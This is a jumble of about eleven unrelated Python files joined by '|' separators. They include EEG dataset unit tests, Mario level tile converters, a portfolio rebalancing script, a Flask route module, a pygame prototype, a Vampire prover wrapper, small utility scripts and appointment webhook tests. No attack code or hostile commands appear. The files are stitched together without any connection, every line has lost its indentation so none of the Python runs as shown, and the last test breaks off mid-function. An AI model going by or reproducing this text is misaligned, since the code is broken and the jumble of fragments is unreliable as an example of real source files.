def test_datasets_init(self):
codes = []
logger = logging.getLogger("moabb.datasets.base")
deprecated_list, _, _ = zip(*aliases_list)
for ds in dataset_list:
kwargs = {}
if inspect.signature(ds).parameters.get("accept"):
kwargs["accept"] = True
with self.assertLogs(logger="moabb.datasets.base", level="WARNING") as cm:
# We test if the is_abrev does not throw a warning.
# Trick needed because assertNoLogs only inrtoduced in python 3.10:
logger.warning(f"Testing {ds.__name__}")
obj = ds(**kwargs)
if type(obj).__name__ not in deprecated_list:
self.assertEqual(len(cm.output), 1)
self.assertIsNotNone(obj)
if type(obj).__name__ not in deprecated_list:
codes.append(obj.code)
# Check that all codes are unique:
self.assertEqual(len(codes), len(set(codes)))
def test_depreciated_datasets_init(self):
depreciated_names, _, _ = zip(*aliases_list)
for ds in db.__dict__.values():
if ds in dataset_list:
continue
if not (inspect.isclass(ds) and issubclass(ds, BaseDataset)):
continue
kwargs = {}
if inspect.signature(ds).parameters.get("accept"):
kwargs["accept"] = True
with self.assertLogs(logger="moabb.utils", level="WARNING"):
# We test if depreciated_alias throws a warning.
obj = ds(**kwargs)
self.assertIsNotNone(obj)
self.assertIn(ds.__name__, depreciated_names)
def test_dataset_list(self):
if aliases_list:
depreciated_list, _, _ = zip(*aliases_list)
else:
pass
all_datasets = [
c
for c in db.__dict__.values()
if (
inspect.isclass(c)
and issubclass(c, BaseDataset)
# and c.__name__ not in depreciated_list
)
]
assert len(dataset_list) == len(all_datasets)
assert set(dataset_list) == set(all_datasets)
class Test_VirtualReality_Dataset(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def test_canary(self):
assert Cattan2019_VR() is not None
def test_warning_if_parameters_false(self):
with self.assertWarns(UserWarning):
Cattan2019_VR(virtual_reality=False, screen_display=False)
def test_data_path(self):
ds = Cattan2019_VR(virtual_reality=True, screen_display=True)
data_path = ds.data_path(1)
assert len(data_path) == 2
assert "subject_01_VR.mat" in data_path[0]
assert "subject_01_PC.mat" in data_path[1]
def test_get_block_repetition(self):
ds = FakeVirtualRealityDataset()
subject = 5
block = 3
repetition = 4
_, _, ret = ds.get_block_repetition(P300(), [subject], [block], [repetition])
assert ret.subject.unique()[0] == subject
assert ret.run.unique()[0] == block_rep(block, repetition)
class Test_CompoundDataset(unittest.TestCase):
def __init__(self, *args, **kwargs):
self.paradigm = "p300"
self.n_sessions = 2
self.n_subjects = 2
self.n_runs = 2
self.ds = FakeDataset(
n_sessions=self.n_sessions,
n_runs=self.n_runs,
n_subjects=self.n_subjects,
event_list=["Target", "NonTarget"],
paradigm=self.paradigm,
)
super().__init__(*args, **kwargs)
def test_fake_dataset(self):
"""This test will insure the basedataset works."""
param_list = [(None, None), ("session_0", "run_0"), (["session_0"], ["run_0"])]
for sessions, runs in param_list:
with self.subTest():
subjects_list = [(self.ds, 1, sessions, runs)]
compound_data = CompoundDataset(
subjects_list,
code="CompoundDataset-test",
interval=[0, 1],
paradigm=self.paradigm,
)
data = compound_data.get_data()
# Check event_id is correctly set
self.assertEqual(compound_data.event_id, self.ds.event_id)
# Check data origin is correctly set
self.assertEqual(data[1]["data_origin"], subjects_list[0])
# Check data type
self.assertTrue(isinstance(data, dict))
self.assertIsInstance(data[1]["session_0"]["run_0"], mne.io.BaseRaw)
# Check data size
self.assertEqual(len(data), 1)
expected_session_number = self.n_sessions if sessions is None else 1
self.assertEqual(len(data[1]), expected_session_number)
expected_runs_number = self.n_runs if runs is None else 1
self.assertEqual(len(data[1]["session_0"]), expected_runs_number)
# bad subject id must raise error
self.assertRaises(ValueError, compound_data.get_data, [1000])
def test_compound_dataset_composition(self):
# Test we can compound two instance of CompoundDataset into a new one.
# Create an instance of CompoundDataset with one subject
subjects_list = [(self.ds, 1, None, None)]
compound_dataset = CompoundDataset(
subjects_list,
code="CompoundDataset-test",
interval=[0, 1],
paradigm=self.paradigm,
)
# Add it two time to a subjects_list
subjects_list = [compound_dataset, compound_dataset]
compound_data = CompoundDataset(
subjects_list,
code="CompoundDataset-test",
interval=[0, 1],
paradigm=self.paradigm,
)
# Assert that the coumpouned dataset has two times more subject than the original one.
data = compound_data.get_data()
self.assertEqual(len(data), 2)
def test_get_sessions_per_subject(self):
# define a new fake dataset with two times more sessions:
self.ds2 = FakeDataset(
n_sessions=self.n_sessions * 2,
n_runs=self.n_runs,
n_subjects=self.n_subjects,
event_list=["Target", "NonTarget"],
paradigm=self.paradigm,
)
# Add the two datasets to a CompoundDataset
subjects_list = [(self.ds, 1, None, None), (self.ds2, 1, None, None)]
compound_dataset = CompoundDataset(
subjects_list,
code="CompoundDataset",
interval=[0, 1],
paradigm=self.paradigm,
)
# Test private method _get_sessions_per_subject returns the minimum number of sessions per subjects
self.assertEqual(compound_dataset._get_sessions_per_subject(), self.n_sessions)
def test_event_id_correctly_updated(self):
# define a new fake dataset with different event_id
self.ds2 = FakeDataset(
n_sessions=self.n_sessions,
n_runs=self.n_runs,
n_subjects=self.n_subjects,
event_list=["Target2", "NonTarget2"],
paradigm=self.paradigm,
)
# Add the two datasets to a CompoundDataset
subjects_list = [(self.ds, 1, None, None), (self.ds2, 1, None, None)]
compound_dataset = CompoundDataset(
subjects_list,
code="CompoundDataset",
interval=[0, 1],
paradigm=self.paradigm,
)
# Check that the event_id of the compound_dataset is the same has the first dataset
self.assertEqual(compound_dataset.event_id, self.ds.event_id)
# Check event_id get correctly updated when taking a subject from dataset 2
data = compound_dataset.get_data(subjects=[2])
self.assertEqual(compound_dataset.event_id, self.ds2.event_id)
self.assertEqual(len(data.keys()), 1)
# Check event_id is correctly put back when taking a subject from the first dataset
data = compound_dataset.get_data(subjects=[1])
self.assertEqual(compound_dataset.event_id, self.ds.event_id)
self.assertEqual(len(data.keys()), 1)
def test_datasets_init(self):
codes = []
for ds in compound_dataset_list:
kwargs = {}
if inspect.signature(ds).parameters.get("accept"):
kwargs["accept"] = True
obj = ds(**kwargs)
self.assertIsNotNone(obj)
codes.append(obj.code)
# Check that all codes are unique:
self.assertEqual(len(codes), len(set(codes)))
def test_dataset_list(self):
if aliases_list:
depreciated_list, _, _ = zip(*aliases_list)
else:
depreciated_list = []
all_datasets = [
c
for c in db_compound.__dict__.values()
if (
inspect.isclass(c)
and issubclass(c, CompoundDataset)
and c.__name__ not in depreciated_list
and c.__name__ != "CompoundDataset"
)
]
assert len(compound_dataset_list) == len(all_datasets)
assert set(compound_dataset_list) == set(all_datasets)
|
count = 0
def isTriplet(word,l):
for i in range(len(word)-2):
(l1,l2,l3) = word[i],word[i+1],word[i+2]
if l1 == l and l2 == l and l3 == l:
return True
return False
originalword = "statisticians"
myword = "statstcians"
def main():
countPerms()
def countPerms():
prPerms("", "abcd")
print(count)
def prPerms(start,choices):
if choices == "":
print(start)
global count
count+=1
## if(count%100000==0):
## print(".",)
return
for i in range(len(choices)):
prPerms(start+choices[i],choices[:i]+choices[i+1:])
main()
|
from pathlib import Path
import os
def convert_super_mario_bros_tile(character):
if character == '-': return '-'
elif character == 'X': return 'b'
elif character == 'x': return 'b'
elif character == 'S': return 'b'
elif character == 'Q': return 'b'
elif character == 'E': return 'A'
elif character == '<': return 'b'
elif character == '>': return 'b'
elif character == '[': return 'b'
elif character == ']': return 'b'
elif character == 'o': return '$'
elif character == 'B': return 'M'
elif character == 'b': return 'b'
elif character == '?': return 'b'
elif character == 'f': return 'f'
elif character == '#': return 'b'
elif character == 'p': return 'b'
elif character == 'P': return 'b'
elif character == 'e': return 'A'
elif character == 'c': return 'M'
elif character == 'g': return 'A'
else:
print(f'{character} not handled by conversion')
return character
def convert_super_mario_bros_2_japan_tile(character):
if character == '-': return '-'
elif character == 'f': return 'f'
elif character == 'b': return 'b'
elif character == 'X': return 'b'
elif character == '?': return 'b'
elif character == 'Q': return 'b'
elif character == '<': return 'b'
elif character == '>': return 'b'
elif character == '[': return 'b'
elif character == ']': return 'b'
elif character == 'S': return 'b'
elif character == 'E': return 'A'
elif character == 'o': return '$'
elif character == 'B': return 'M'
else:
print(f'{character} not handled by conversion')
return character
def convert_super_mario_bros_mario_land_tile(character):
if character == '-': return '-'
elif character == 'f': return 'f'
elif character == 'X': return 'b'
elif character == '[': return 'b'
elif character == ']': return 'b'
elif character == '<': return 'b'
elif character == '>': return 'b'
elif character == 'Q': return 'b'
elif character == '?': return 'b'
elif character == 'S': return 'b'
elif character == 'E': return 'A'
elif character == 'o': return '$'
elif character == 'B': return 'M'
elif character == 'b': return 'b'
else:
print(f'{character} not handled by conversion')
return character
def convert_super_mario_bros_2_tile(character):
if character == '-': return '-'
elif character == 'p': return 'b'
elif character == 'P': return 'b'
elif character == '?': return 'b'
elif character == '#': return 'b'
elif character == 'B': return 'b'
elif character == 'e': return 'A'
elif character == 'e': return 'A'
elif character == 'g': return 'g'
elif character == 'f': return 'f'
elif character == 'c': return 'M'
else:
print(f'{character} not handled by conversion')
return character
def convert(path, name, start_col, conversion, vertical=False):
pcg_platformer_path = os.path.join('..', 'Assets', 'Resources', 'Levels', name)
if not os.path.exists(pcg_platformer_path):
os.mkdir(pcg_platformer_path)
for file_name in os.listdir(path):
f = open(os.path.join(path, file_name))
content = f.readlines()
f.close()
converted = []
for line in content:
row = list(line.strip())
row.append('f')
converted.append([conversion(c) for c in row])
# find where the player can starts
start_row = len(converted) - 1
while converted[start_row][start_col] != '-':
start_row -= 1
converted[start_row][start_col] = 's'
file_name = file_name.replace('.png', '')
f = open(os.path.join(pcg_platformer_path, file_name), 'w')
f.write('\n'.join([''.join(row) for row in converted]))
f.close()
def get_vglc_path(game_name):
return os.path.join(Path.home(), 'data', 'TheVGLC', game_name, 'Processed')
if __name__ == '__main__':
convert(get_vglc_path("Super Mario Bros"), "SuperMarioBros", 3, convert_super_mario_bros_tile)
convert(get_vglc_path("Super Mario Bros 2 (Japan)"), "SuperMarioBros2Japan", 3, convert_super_mario_bros_2_japan_tile)
convert(get_vglc_path("Super Mario Land"), "SuperMarioLand", 3, convert_super_mario_bros_mario_land_tile)
convert(os.path.join(get_vglc_path("Super Mario Bros 2"), 'WithEnemies'), "SuperMarioBros2", 3, convert_super_mario_bros_2_tile) |
"""
badnwidth portfolio
similar to bandw-2-stackoverfl-almostoriginal.py
"""
## define functions
def setup_df(df, A, B):
"""
asset A and B are strings.
"""
df = df[[A, B]]
df = df.fillna(method='ffill') # maybe remove
A_shares = A + '_shares'
B_shares = B + '_shares'
A_value = A +'_value'
B_value = B +'_value'
df[A_shares] = 0
df[B_shares] = 0
df[A_value] = 0
df[B_value] = 0
df['wA'] = 0
return df
def invest(df, i, amount, perc, A, B):
"""
Invest amount dollars evenly between Stocks and Gold
starting at ordinal index i.
This modifies df.
"""
A_shares = A + '_shares'
B_shares = B + '_shares'
A_value = A +'_value'
B_value = B +'_value'
c = dict([(col, j) for j, col in enumerate(df.columns)])
df.iloc[i:, c[A_shares]] = amount * perc / df.iloc[i, c[A]]
df.iloc[i:, c[B_shares]] = amount * (1-perc) / df.iloc[i, c[B]]
df.iloc[i:, c[A_value]] = (
df.iloc[i:, c[A]] * df.iloc[i:, c[A_shares]])
df.iloc[i:, c[B_value]] = (
df.iloc[i:, c[B]] * df.iloc[i:, c[B_shares]])
df.iloc[i:, c['wA']] = (
df.iloc[i:, c[A_value]] / (df.iloc[i:, c[B_value]]+df.iloc[i:, c[A_value]]) )
def rebalance(df, tol, perc, A,B, i=0):
"""
Rebalance df whenever the ratio falls outside the tolerance range.
This modifies df.
"""
c = dict([(col, j) for j, col in enumerate(df.columns)])
A_value = A +'_value'
B_value = B +'_value'
while True:
mask = (df['wA'] >= perc+tol) | (df['wA'] <= perc-tol)
# ignore prior locations where the ratio falls outside tol range
mask[:i] = False
try:
# Move i one index past the first index where mask is True
# Note that this means the ratio at i will remain outside tol range
i = np.where(mask)[0][0] + 1
except IndexError:
break
# recalc the amount we own today.
amount = (df.iloc[i, c[A_value]] + df.iloc[i, c[B_value]])
# invest that amount
invest(df, i, amount, perc, A,B)
return df
def create_pf(df, A, B, pf):
"""
input: A, B, pf are strings. pf is portfolio name.
assumes df have cols from functions above (invest and rebalance)
"""
df[pf] = df[A + '_value'] + df[B + '_value']
df[pf] = price2aum(df[pf])
return df
def rm_cols(df, A, B):
A_shares = A + '_shares'
B_shares = B + '_shares'
A_value = A +'_value'
B_value = B +'_value'
cols_to_drop = [A_shares, B_shares, A_value, B_value]
df = df.drop(cols_to_drop, axis=1)
return df
## create legacy portfolio 60/40 stocks bonds.
# choose assets
A1 = 'Stocks'
B1 = 'Bonds'
# read and setup
pri_fin_mat_2 = pd.read_csv(file_pri_fin, index_col = 'Date', parse_dates=True)
pri_fin_mat_2 = re_index_date(pri_fin_mat_2)
df_trd = setup_df(pri_fin_mat_2, A=A1, B=B1)
del pri_fin_mat_2
# rebalance
perc1 = 0.60
tol1 = 0.05
invest(df_trd, i=0, amount=100, perc=perc1, A=A1, B=B1)
rebalance(df_trd, tol=tol1, perc=perc1, A=A1, B=B1)
# remove and create cols
pf1 = 'TRD'
df_trd = create_pf(df_trd, A1, B1, pf1)
# remove cols shares and value
df_trd = rm_cols(df_trd, A1, B1)
# plot weight
df_trd.wA.plot()
plt.ylabel('Weight in ' + A1)
plt.axhline(y=perc1 + tol1, color='black', linestyle='--')
plt.axhline(y=perc1 - tol1, color='black', linestyle='--')
# see max min w
df_trd.wA.min(), df_trd.wA.max()
# plot performance
price2aum(df_trd[[A1, B1, pf1]]).plot()
# see
df_trd.head()
## create bandw portfolio 95/5 with LEG/BLX. name it BAL for balanced.
# choose assets
A2 = 'BLX'
B2 = 'TRD' # a 60/40 stocks/bonds
# read and setup
df_bal = pd.concat([df_trd['TRD'], pri_mat['BLX']], axis=1, join='inner')
df_bal = df_bal.reindex()
assert (df_bal.index == pri_mat.index).all()
df_bal = setup_df(df_bal, A2, B2)
# rebalance
perc2 = 0.05
tol2 = 0.02
invest(df_bal, i=0, amount=100, perc=perc2, A=A2, B=B2)
rebalance(df_bal, tol=tol2, perc=perc2, A=A2, B=B2)
# remove and create cols
#pf2 ='5/95 BLX/TRD'
pf2 = 'BAL'
df_bal = create_pf(df=df_bal, A=A2, B=B2, pf=pf2)
df_bal.head()
# remove cols shares and value
df_bal = rm_cols(df_bal, A=A2, B=B2)
# plot weight
df_bal.wA.plot()
ylabel2 = 'Weight in ' + A2 + '\n is ' + str(perc2) + ' +- ' + str(tol2)
plt.ylabel(ylabel2)
plt.axhline(y=perc2 + tol2, color='black', linestyle='--')
plt.axhline(y=perc2 - tol2, color='black', linestyle='--')
title2 = 'Bandwidth rebalanced portfolio \n with 5% BLX and 95% TRD'
plt.title(title2)
plt.savefig('output/df_bal.wA.png')
# plot performance
#price2aum(df_bal[[A2, B2, pf2]]).plot(logy=True)
price2aum(df_bal[[B2, pf2]]).plot()
title3 = 'TRD vs BAL: \n Traditional 60%/40% stocks/bonds portfolio (TRD) \n vs 5%/95% BLX/TRD bandwidth rebalanced (BAL)'
plt.title(title3)
plt.savefig('output/df_bal-aum.png')
## plot 1% and 5% allocation to blx.
## plot area weights stocks/bonds/blx in the BALanced portf
# not same index => must join
df_bal.shape != df_trd.shape
# concat, inner join
df_bal_w = pd.concat([df_trd.wA, df_bal.wA], axis=1, join='inner')
df_bal_w.columns = ['w_stocks_in_trd', 'w_blx_in_bal']
assert (df_bal_w.w_blx_in_bal == df_bal.wA).all()
# weight on stock in balanced pf = weights in TRD * (1 - blx weight)
df_bal_w['w_stocks_in_bal'] = df_bal_w['w_stocks_in_trd'] * (1 - df_bal_w.w_blx_in_bal)
# weight in bond is the rest
df_bal_w['w_bonds_in_bal'] = 1 - df_bal_w.w_blx_in_bal - df_bal_w['w_stocks_in_bal']
df_bal_w.columns = ['removecol', 'BLX', 'Stocks', 'Bonds'] # think it is like this
df_bal_w.drop('removecol', axis=1, inplace=True)
# plot
df_bal_w.plot.area(color=['#483d8b', '#ee82ee', '#a020f0'], alpha=0.8)
title4 = 'BAL portfolio: \n 5% to BLX and 95% to 60/40 stocks/bonds'
title5 = 'BAL portfolio: 5% in BLX and 95% in TRD'
plt.title(title5)
plt.ylabel('Allocation in BAL portfolio')
plt.legend(loc=(1.04,0))
plt.savefig('output/df_bal_w.png')
"""
todo maybe call it TRD for traditional not LEG for legacy. then we can say traditional 60/40
todo fix index as datetime! either via new = df.resample('T', how='mean') or via re_index_date
"""
|
ls = []
dict = {"name": "小明", "age": 20, "sex": "male"}
# file = open("./Test.txt",'r',encoding='utf-8')
# 只读文件 若文件不存在 则程序会报错
file = open("readfile.txt", 'w', encoding='utf-8')
# 写文件 若文件不存在 则创建一个文件到当前目录下
# file = open("readfile.txt",'r+',encoding='utf-8')
# 读+写文件,在读文件的前提下对于文件进行追加写操作
# 将列表中的元素逐个写入文件中
ls = ['1', '2', '3', '4', '5']
for i in ls:
fileopen = file.write(i + "\n") # 向文件中逐个写入列表名为ls的列表变量
else:
# 此处else当且仅当for语句执行完毕时才会执行else中的内容
# 若for循环没有执行完毕 则else中的语句将不会执行
print("数据写入成功!")
# writelines write三者中有本质上的区别 注意!!!
file.close()
|
from zz import app
from flask import request,render_template,flash,abort,url_for,redirect,session,Flask,g
from zz.dao import lovemapper
from zz.redissession import redis
from zz.auth import shouquan_required
##desc:
##谈恋爱模块
##desc:
##谈恋爱首页
@app.route("/love/index/<id>")
@app.route("/love/index")
@app.route("/love/index/")
@shouquan_required
def love_index(id=0):
##desc:
##先跳过校验,后面加入装饰器
## 判断男女
loveuser = lovemapper.getIndexOne(id)
return render_template("html/loveuser/index.html",
loveuser=loveuser)
##desc:
##谈恋爱消息页
@app.route("/love/msg")
def love_msg():
msg = str(redis.get("test"))
return render_template("html/loveuser/msg.html",
msg=msg) |
#! /usr/local/bin/python
import pygame
from pygame.locals import *
import world, gfx
def fade(img, depth):
ret_val = img.copy()
if(depth == 0): return ret_val
for x in xrange(ret_val.get_width()):
for y in xrange(ret_val.get_height()):
(r, g, b, a) = ret_val.get_at((x,y))
ret_val.set_at((x,y), (128*depth + r*(1-depth),
128*depth + g*(1-depth),
128*depth + b*(1-depth),
a))
return ret_val
class depth_img:
def __init__(self, name):
img = pygame.image.load('gfx/'+name+'.png')
self.d = [ fade(img, i/8.0).convert_alpha()
for i in xrange(8) ]
def level(self, lev):
if lev < 0: return self.d[0]
if lev > 7: return self.d[7]
return self.d[lev]
#typeahead command examples. Applies to the selected area.
#'excavate'
#'mine [for <material>] [and deliver to <place>]'
#'fill [with <material>]'
#'move [<object type>] to <place>'
#'build [<thing>]'
#'evacuate [to <place>]'
#'finish walls'
#'clean up'
#modifiers:
#', <dwarf name>/everyone'
#'with priority <number>'
#display with icons for each dwarf, and a number indicating the
#priority of the current task?
class dagger_io:
def main(self):
w = world.world
clock = pygame.time.Clock()
(ssx, ssy, ssz) = (0,0,0)
(sex, sey, sez) = (0,0,0)
csr = gfx.sprite_3d(gfx.mark1, 0, 0, 0, pri=1)
gfx.change_cut(csr.z)
for ix in range(-5,30):
for iy in range(-5,30):
w(ix,iy,0)
try:
import psyco
psyco.full()
except:
print "Installing Psyco might make this run faster."
while 1:
clock.tick(25)
for event in pygame.event.get():
if event.type == QUIT: return
elif event.type == KEYUP:
if event.key == K_LSHIFT:
(sex, sey, sez) = (csr.x, csr.y, csr.z)
print sex, sey, sez
gfx.paint_selection((ssx,ssy,ssz), (sex, sey, sez))
print clock.get_fps()
elif event.type == KEYDOWN:
if event.key == K_ESCAPE:
return
if event.key == K_LEFT:
csr.move(-1,0,0)
elif event.key == K_RIGHT:
csr.move(1,0,0)
elif event.key == K_UP:
csr.move(0,1,0)
elif event.key == K_DOWN:
csr.move(0,-1,0)
elif event.key == K_PERIOD:
csr.move(0,0,-1)
gfx.change_cut(csr.z)
elif event.key == K_COMMA:
csr.move(0,0,1)
gfx.change_cut(csr.z)
elif event.key == K_LSHIFT:
(ssx, ssy, ssz) = (csr.x, csr.y, csr.z)
#w.invert(csr.x, csr.y, csr.z)
elif event.key == K_SPACE:
w.invert(csr.x, csr.y, csr.z)
elif event.key == K_r:
w.realize(csr.x, csr.y, csr.z)
elif event.key == K_2:
fill = (w(sex, sey, sez) == None)
for ix in range(min(ssx, sex), max(ssx, sex)+1):
for iy in range(min(ssy, sey), max(ssy, sey)+1):
for iz in range(min(ssz, sez), max(ssz, sez)+1):
if fill:
w.construct(ix,iy,iz)
else:
w.dig(ix,iy,iz)
else:
print event.key, event
print clock.get_fps()
world.process_structural_failure()
gfx.paint_frame()
framerate = clock.get_fps()
if framerate < 20:
print "low framerate: ", framerate
# screen.blit(background, (0,0))
# for z in range(7,-1+csr.z,-1):
# for x in xrange(25):
# for y in xrange(24,-1,-1):
# w_loc = 24 * x + 12 * y
# h_loc = 12 * x - 24 * y + 13 * z + 400
# if (csr.z, csr.x, csr.y) == (z, x, y):
# screen.blit(self.cursor_bot_img.level(0),
# (w_loc, h_loc))
# if world[x][y][z] == 1:
# screen.blit(self.block_img.level(z),
# (w_loc, h_loc))
# if (csr.z, csr.x, csr.y) == (z, x, y):
# screen.blit(self.cursor_top_img.level(0),
# (w_loc, h_loc))
#
# pygame.display.flip()
if __name__ == '__main__': dagger_io().main()
|
import copy
import itertools
import json
import logging
import os
import re
import tempfile
import numpy as np
import pandas as pd
import tensorflow as tf
from questions import config
from . import process
from . import symbols
log = logging.getLogger(__name__)
supported_precedence_names = ['predicate', 'function']
class Result(process.Result):
def __init__(self, process_result, result_symbols, clauses):
log.debug(process_result)
super().__init__(**process_result.__dict__)
self.symbols = result_symbols
self.clauses = clauses
pd_dtypes = {
**process.Result.pd_dtypes,
'time_elapsed_vampire': float,
'saturation_iterations': pd.UInt32Dtype(),
'memory_used': pd.UInt32Dtype()
}
def symbols_of_type(self, symbol_type):
return symbols.symbols_of_type(self.symbols, symbol_type)
@property
def saturation_iterations(self):
try:
return int(re.search(r'^% Main loop iterations started: (\d+)$', self.stdout, re.MULTILINE)[1])
except TypeError:
return None
@property
def memory_used(self):
try:
return int(re.search(r'^% Memory used \[KB\]: (\d+)$', self.stdout, re.MULTILINE)[1])
except TypeError:
return None
@property
def time_elapsed_vampire(self):
try:
return float(re.search(r'^% Time elapsed: (\d+\.\d+) s$', self.stdout, re.MULTILINE)[1])
except TypeError:
return None
def call(problem, options=None, timeout=None, precedences=None, get_symbols=False, get_clauses=False, get_stdout=True,
get_stderr=True):
try:
mode = options['mode']
except KeyError:
mode = None
log.debug(f'Running Vampire. Problem: {problem}. Mode: {mode}.')
result_symbols = None
clauses = None
with OptionManager(problem, base_options=options, precedences=precedences, get_symbols=get_symbols,
get_clauses=get_clauses) as option_manager:
args_instantiated = option_manager.args()
result = process.run(args_instantiated, timeout=timeout, capture_stdout=get_stdout, capture_stderr=get_stderr)
if get_symbols:
try:
result_symbols = option_manager.symbols()
except FileNotFoundError:
pass
except Exception as e:
raise RuntimeError(f'Failed to load symbols of problem {problem}.') from e
if get_clauses:
try:
clauses = option_manager.clauses()
except (FileNotFoundError, json.JSONDecodeError):
pass
except Exception as e:
raise RuntimeError(f'Failed to load clauses of problem {problem}.') from e
return Result(result, result_symbols, clauses)
def random_precedence(symbol_type, length, seed=None, dtype=np.uint32):
if seed is not None:
if not isinstance(seed, tuple):
seed = (seed,)
salt = supported_precedence_names.index(symbol_type)
# Salt the seed for the given symbol type.
seed = (salt, *seed)
rng = np.random.RandomState(seed)
if symbol_type == 'predicate':
# The equality symbol should be placed first in all the predicate precedences.
# We assume that the equality symbol has the index 0, which is a convention in Vampire.
head = np.asarray([0], dtype=dtype)
tail = rng.permutation(np.arange(1, length, dtype=dtype))
res = np.concatenate((head, tail))
else:
res = rng.permutation(np.arange(length, dtype=dtype))
assert res.dtype == dtype
assert res.shape == (length,)
return res
def program():
try:
return os.environ['VAMPIRE']
except KeyError:
pass
return 'vampire'
def include_path():
return config.tptp_path()
class OptionManager:
def __init__(self, problem, base_options=None, precedences=None, get_symbols=False, get_clauses=False):
self.problem = problem
if base_options is None:
base_options = {}
self.base_options = base_options
if precedences is None:
precedences = {}
assert set(precedences.keys()) <= set(supported_precedence_names)
self.precedences = precedences
self.symbols_enabled = get_symbols
self.clauses_enabled = get_clauses
self.temp_dir = None
def enabled(self):
return len(self.precedences) > 0 or self.symbols_enabled or self.clauses_enabled
def __enter__(self):
if self.enabled():
self.temp_dir = tempfile.TemporaryDirectory(prefix=f'{config.program_name()}_', dir=config.scratch_dir())
for name, precedence in self.precedences.items():
if isinstance(precedence, tf.Tensor):
precedence = precedence.numpy()
precedence.tofile(self.precedence_path(name), sep=',')
return self
def __exit__(self, type, value, traceback):
if self.temp_dir is not None:
self.temp_dir.cleanup()
self.temp_dir = None
def options(self):
res = copy.deepcopy(self.base_options)
for name, precedence in self.precedences.items():
assert name in supported_precedence_names
res[f'{name}_precedence'] = self.precedence_path(name)
if self.symbols_enabled:
res['symbols_csv_output'] = self.symbols_path()
if self.clauses_enabled:
res['clauses_json_output'] = self.clauses_path()
include = include_path()
if include is not None:
res['include'] = include
return res
def args(self):
return list(itertools.chain([program(), config.full_problem_path(self.problem)],
*((f'--{name}', str(value)) for (name, value) in self.options().items())))
def symbols(self):
return symbols.load(self.symbols_path())
def clauses(self):
return load_clauses(self.clauses_path())
def precedence_path(self, name):
return os.path.join(self.temp_dir.name, f'{name}_precedence.csv')
def symbols_path(self):
return os.path.join(self.temp_dir.name, 'symbols.csv')
def clauses_path(self):
return os.path.join(self.temp_dir.name, 'clauses.json')
def load_clauses(file):
# Throws FileNotFoundError if `file` does not exist.
log.debug(f'Loading {file} of size {os.path.getsize(file)}.')
# Throws json.JSONDecodeError if the content is malformed.
with open(file) as f:
return json.load(f)
def save_clauses(clauses, file):
with open(file, 'w') as f:
json.dump(clauses, f)
|
import mailbox
import csv
writer = csv.writer(open("output.csv", "wb"))
for message in mailbox.mbox('input.mbox'):
writer.writerow([message['message-id'], message['subject'], message['from']])
print 'Mboxing complete! *high five*'
|
def removeDuplicates(nums):
"""
:type nums: List[int]
:rtype: int
"""
if not nums:
return 0
index = 0
for i in range(1, len(nums)):
if nums[index] != nums[i]:
index += 1
nums[index] = nums[i]
return index + 1
nums = [0,0,1,1,1,2,2,3,3,4]
print(removeDuplicates(nums))
print(nums)
|
from datetime import datetime, timedelta
from tcsocket.app.models import sa_appointments, sa_services
from tcsocket.app.worker import delete_old_appointments, startup
from .conftest import MockEngine, count, create_appointment, create_company, select_set, signed_request
async def create_apt(cli, company, url=None, **kwargs):
data = dict(
id=123,
service_id=123,
service_name='testing service',
extra_attributes=[],
colour='#abc',
appointment_topic='testing appointment',
attendees_max=42,
attendees_count=4,
attendees_current_ids=[1, 2, 3],
start='1986-01-01T12:00:00',
finish='1986-01-01T13:00:00',
price=123.45,
location='Whatever',
)
data.update(kwargs)
return await signed_request(cli, url or f'/{company.public_key}/webhook/appointments/123', **data)
async def test_create(cli, db_conn, company):
r = await create_apt(cli, company)
assert r.status == 200, await r.text()
curr = await db_conn.execute(sa_services.select())
result = await curr.first()
assert result.id == 123
assert result.company == company.id
assert result.name == 'testing service'
assert result.colour == '#abc'
assert result.extra_attributes == []
curr = await db_conn.execute(sa_appointments.select())
result = await curr.first()
assert result.service == 123
assert result.topic == 'testing appointment'
assert result.attendees_max == 42
assert result.attendees_count == 4
assert result.attendees_current_ids == [1, 2, 3]
assert result.start == datetime(1986, 1, 1, 12, 0)
assert result.finish == datetime(1986, 1, 1, 13, 0)
assert result.price == 123.45
assert result.location == 'Whatever'
async def test_delete(cli, db_conn, company):
url = f'/{company.public_key}/webhook/appointments/231'
r = await create_apt(cli, company, url)
assert r.status == 200, await r.text()
assert 1 == await count(db_conn, sa_appointments)
assert 1 == await count(db_conn, sa_services)
r = await signed_request(cli, url, method_='DELETE')
assert r.status == 200, await r.text()
assert {'status': 'success'} == await r.json()
assert 0 == await count(db_conn, sa_appointments)
assert 0 == await count(db_conn, sa_services)
# should do nothing
r = await signed_request(cli, url, method_='DELETE')
assert r.status == 200, await r.text()
assert {'status': 'appointment not found'} == await r.json()
assert 0 == await count(db_conn, sa_appointments)
assert 0 == await count(db_conn, sa_services)
async def test_delete_keep_service(cli, db_conn, company):
r = await create_apt(cli, company)
assert r.status == 200, await r.text()
url = f'/{company.public_key}/webhook/appointments/124'
r = await create_apt(cli, company, url)
assert r.status == 200, await r.text()
assert 2 == await count(db_conn, sa_appointments)
assert 1 == await count(db_conn, sa_services)
r = await signed_request(cli, url, method_='DELETE')
assert r.status == 200, await r.text()
assert {'status': 'success'} == await r.json()
assert 1 == await count(db_conn, sa_appointments)
assert 1 == await count(db_conn, sa_services)
async def test_delete_wrong_company(cli, db_conn, company):
company2 = await create_company(db_conn, 'compan2_public', 'compan2_private', name='company2')
r = await create_apt(cli, company2)
assert r.status == 200, await r.text()
url = f'/{company.public_key}/webhook/appointments/123'
r = await signed_request(cli, url, method_='DELETE')
assert r.status == 200, await r.text()
assert {'status': 'appointment not found'} == await r.json()
assert 1 == await count(db_conn, sa_appointments)
url = f'/{company2.public_key}/webhook/appointments/123'
r = await signed_request(cli, url, method_='DELETE')
assert r.status == 200, await r.text()
assert {'status': 'success'} == await r.json()
assert 0 == await count(db_conn, sa_appointments)
async def test_create_conflict(cli, db_conn, company):
r = await create_apt(cli, company)
assert r.status == 200, await r.text()
company2 = await create_company(db_conn, 'compan2_public', 'compan2_private', name='company2')
r = await create_apt(cli, company2)
assert r.status == 409, await r.text()
async def test_extra_attrs(cli, db_conn, company):
extra_attrs = [
{'name': 'Foobar', 'type': 'checkbox', 'machine_name': 'foobar', 'value': False, 'sort_index': 124},
{'name': 'Smash', 'type': 'text_short', 'machine_name': 'smash', 'value': 'I love to party', 'sort_index': 123},
]
r = await create_apt(cli, company, extra_attributes=extra_attrs)
assert r.status == 200, await r.text()
curr = await db_conn.execute(sa_services.select())
